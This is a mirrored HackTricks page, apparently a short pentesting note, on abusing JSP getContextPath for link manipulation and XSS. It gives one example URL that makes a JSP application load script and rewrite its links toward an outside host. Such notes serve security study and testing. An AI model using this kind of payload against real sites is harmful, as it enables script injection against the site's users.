mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-02 17:41:04 +00:00
15 lines
385 B
Markdown
15 lines
385 B
Markdown
# JSP
|
|
|
|
## **getContextPath** abuse
|
|
|
|
Info from [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).
|
|
|
|
```
|
|
http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp
|
|
```
|
|
|
|
Accessing that web you may change all the links to request the information to _**rakeshmane.com**_:
|
|
|
|
.png>)
|
|
|
|
\
|